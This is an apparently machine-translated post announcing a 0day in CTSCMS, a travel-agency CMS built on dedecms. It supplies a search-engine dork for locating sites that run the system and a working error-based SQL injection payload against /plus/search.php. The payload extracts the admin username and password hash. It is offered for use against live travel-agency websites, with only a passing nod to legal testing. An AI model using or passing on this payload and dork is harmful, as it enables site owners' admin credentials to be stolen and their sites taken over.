logo
DATABASE RESOURCES PRICING ABOUT US

Travel website management system[CTSCMS]0day-vulnerability warning-the black bar safety net

Description

New Year's extra point 0day,small shared! China travel service website management system CTSCMS, this site I recently found. The use of dedecms secondary development,weaving dreams of the kernel. Due to the neglect of the official system upgrade causes the program to have a lot of vulnerabilities. The recent burst of injection vulnerabilities are present,the history of the vulnerabilities don't know exists. Google: the 2002-2011 CTSCMS.COM that inurl:users/reg.php travel Agency POC:/plus/search. php? keyword=as&typeArr[1 1 1%3D@`\")+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%2 3@__admin`+limit+0,1),1,6 2)))a+from+information_schema. tables+group+by+a)b)%2 3@`\"+]=a Later I found,this set of programs is a person in the domestic many travel Agency website in with ! [](/Article/UploadPic/2013-1/201313113204132863.gif) Many of the large travel Agency websites are used,please the law allows within the scope of the test. Hackers take care.....